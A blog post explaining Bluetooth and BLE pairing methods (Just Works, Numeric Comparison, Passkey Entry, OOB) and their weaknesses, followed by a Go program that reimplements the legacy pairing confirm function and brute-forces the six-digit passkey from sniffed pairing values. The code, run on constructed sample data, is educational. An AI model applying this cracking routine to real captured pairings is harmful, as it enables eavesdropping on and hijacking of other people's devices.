Be yourself; Everyone else is already taken.
— Oscar Wilde.
This is the first post on my new blog. I’m just getting this new blog going, so stay tuned for more. Subscribe below to get notified when I post new updates.
Bluetooth and Bluetooth Low Energy (BLE) devices are part of everyday life today. Fitness trackers, smart speakers, toys, and a host of other products use these battery-efficient, reasonably fast wireless protocols. One of the first steps in using any BT/BLE device is to “pair” it with a mobile phone (or another peripheral). Pairing is where the two devices establish the keys they will use; once paired, and provided both sides store those keys (the specification calls this “bonding”), the devices can simply “connect” the next time they are in range or are triggered. A “connect” operation does not require re-pairing.
The Bluetooth Core Specification offers devices several options for pairing securely. These mechanisms make it harder for rogue BT/BLE devices to mount “man-in-the-middle” attacks, hijack communication channels, or corrupt or steal information in transit between the communicating devices.
The Bluetooth Core Specification (since 2.1, which introduced Secure Simple Pairing) defines the following four pairing mechanisms, also called association models. Note that BLE “legacy pairing” (Bluetooth 4.0 and 4.1) supports only Just Works, Passkey Entry and OOB; Numeric Comparison became available to BLE with LE Secure Connections in Bluetooth 4.2.
Just Works: This method requires no user interaction and is typically used by devices that have neither a display nor a keypad. It provides no authentication of the peer, so it is susceptible to Man-In-The-Middle (MITM) attacks. With BLE legacy pairing the temporary key used in the exchange is simply zero, so a passive eavesdropper who captures the pairing exchange can also derive the resulting session key; LE Secure Connections removes that eavesdropping weakness through an ECDH key exchange but still offers no MITM protection.
Numeric Comparison: This method adds one step to Just Works. Both devices must have a display and a way for the user to answer yes or no: a six-digit number derived from the key exchange is shown on both devices, and the user confirms that the two numbers match. An attacker sitting in the middle cannot make both sides display the same number, so this method provides protection against MITM attacks.

Passkey Entry: This method is suitable when one or both of the devices have a keypad. A six-digit passkey is generated and displayed by one device and the user enters it into the other, or the user enters the same passkey on both devices. The devices then prove to each other that they hold the same passkey and thereby authenticate each other. This method is intended to protect against both MITM attacks and eavesdropping, with two caveats. In BLE legacy pairing the six-digit passkey carries only about 20 bits of entropy and is used directly as the temporary key, so a passive eavesdropper who captures the pairing exchange can brute-force it offline; LE Secure Connections fixes this by combining the passkey with an ECDH key exchange. In addition, there is a white paper, Bypassing Passkey Authentication in Bluetooth Low Energy by Tomáš Rosa, describing a theoretical MITM attack that does not require prior knowledge of the passkey.
Out of Band (OOB) Pairing: In this method, the information needed to authenticate the devices is exchanged over a different channel, such as NFC, rather than over Bluetooth itself. This protects against MITM attacks and eavesdropping, provided the OOB channel itself is adequately secured. Together with the passkey methods, OOB offers the highest degree of pairing security available for BT/BLE devices.
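To make the Just Works and Passkey Entry points concrete, here is an added worked example (written for this page, not code from the original post or from the Bluetooth SIG). It implements the BLE legacy pairing confirm-value function c1 from Core Spec Vol 3, Part H, Section 2.2.3 on top of Go's standard-library AES, and then plays the passive eavesdropper: given the Pairing Request/Response, the two device addresses, and the Mconfirm and Mrand values that are all sent in the clear, it tries every one of the 1,000,000 possible passkeys until c1 reproduces the captured confirm value. For Just Works the temporary key is zero, so the same search succeeds on the first candidate. The pairing PDUs, addresses, random value and the passkey 123456 are constructed sample data, not a real capture; values are written in the specification's most-significant-octet-first notation, whereas SMP transmits them least-significant-octet-first, so bytes taken from a sniffer must be reversed first. LE Secure Connections is not modelled here.

```go
package main

import (
	"crypto/aes"
	"encoding/binary"
	"errors"
	"fmt"
)

// Block is a 128-bit value written as in the Core Specification: most significant octet first.
// (Over the air SMP sends these values least significant octet first; reverse sniffed bytes first.)
type Block [16]byte

// e is the specification's block function: e(k, p) = AES-128 encryption of p under key k.
func e(k, p Block) Block {
	c, err := aes.NewCipher(k[:])
	if err != nil {
		panic(err) // cannot happen: the key is always 16 bytes
	}
	var out Block
	c.Encrypt(out[:], p[:])
	return out
}

func xor(a, b Block) Block {
	var out Block
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// PairingCtx holds the values sent in the clear during legacy pairing, i.e. everything a
// passive eavesdropper has in addition to the confirm and random values.
type PairingCtx struct {
	Preq, Pres [7]byte // Pairing Request and Pairing Response PDUs (7 octets each)
	Iat, Rat   byte    // initiator / responder address type (0 = public, 1 = random)
	Ia, Ra     [6]byte // initiator / responder device address
}

// c1 is the LE legacy pairing confirm value function (Core Spec Vol 3, Part H, 2.2.3):
//
//	p1 = pres || preq || rat' || iat'
//	p2 = padding || ia || ra
//	c1(k, r, ...) = e(k, e(k, r XOR p1) XOR p2)
func c1(k, r Block, ctx PairingCtx) Block {
	var p1, p2 Block
	copy(p1[0:7], ctx.Pres[:])
	copy(p1[7:14], ctx.Preq[:])
	p1[14] = ctx.Rat
	p1[15] = ctx.Iat
	copy(p2[4:10], ctx.Ia[:])
	copy(p2[10:16], ctx.Ra[:])
	return e(k, xor(e(k, xor(r, p1)), p2))
}

// tkFromPasskey builds the Temporary Key used as k in c1: the six-digit passkey as a
// 128-bit integer for Passkey Entry, and simply 0 for Just Works.
func tkFromPasskey(passkey uint32) Block {
	var tk Block
	binary.BigEndian.PutUint32(tk[12:], passkey)
	return tk
}

// RecoverPasskey is the passive attack: given the captured Mconfirm and Mrand, try every
// possible passkey until c1 reproduces the confirm value. At most 10^6 candidates are needed.
func RecoverPasskey(mconfirm, mrand Block, ctx PairingCtx) (uint32, error) {
	for pk := uint32(0); pk < 1000000; pk++ {
		if c1(tkFromPasskey(pk), mrand, ctx) == mconfirm {
			return pk, nil
		}
	}
	return 0, errors.New("no passkey reproduces the captured confirm value")
}

// DemoCtx is a constructed pairing context (not a real capture): a KeyboardDisplay initiator
// requesting bonding plus MITM protection, a DisplayOnly responder, and made-up public addresses.
func DemoCtx() PairingCtx {
	return PairingCtx{
		Preq: [7]byte{0x01, 0x04, 0x00, 0x05, 0x10, 0x07, 0x07},
		Pres: [7]byte{0x02, 0x00, 0x00, 0x05, 0x10, 0x07, 0x07},
		Iat:  0, Rat: 0,
		Ia:   [6]byte{0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6},
		Ra:   [6]byte{0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6},
	}
}

// DemoMrand is a constructed stand-in for the initiator's random value, which is sent in
// the clear right after both confirm values have been exchanged.
var DemoMrand = Block{0x5a, 0x11, 0xc3, 0x7e, 0x02, 0x9f, 0x44, 0xd8, 0x6b, 0x30, 0xe1, 0x17, 0xa5, 0x8c, 0xf0, 0x29}

func main() {
	ctx := DemoCtx()

	// Passkey Entry: the legitimate initiator used the displayed passkey 123456 as TK.
	mconfirm := c1(tkFromPasskey(123456), DemoMrand, ctx)
	pk, err := RecoverPasskey(mconfirm, DemoMrand, ctx)
	fmt.Printf("Passkey Entry: recovered passkey %06d (err=%v)\n", pk, err)

	// Just Works: TK is 0, so the search succeeds on the very first candidate.
	pk, err = RecoverPasskey(c1(tkFromPasskey(0), DemoMrand, ctx), DemoMrand, ctx)
	fmt.Printf("Just Works:    recovered TK %d (err=%v)\n", pk, err)
}
```

The whole search is two AES block operations per candidate, so even the worst case of a million candidates finishes in well under a second on a laptop; this is exactly what offline BLE cracking tools do against sniffed legacy pairings, which is why the passkey method only earns its eavesdropping protection when LE Secure Connections is in use.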

Once the passkey (or the numeric value) has been shared and verified, a series of message exchanges derives the various cryptographic keys and security parameters. We will go over the rest of the BT/BLE handshake in a separate post.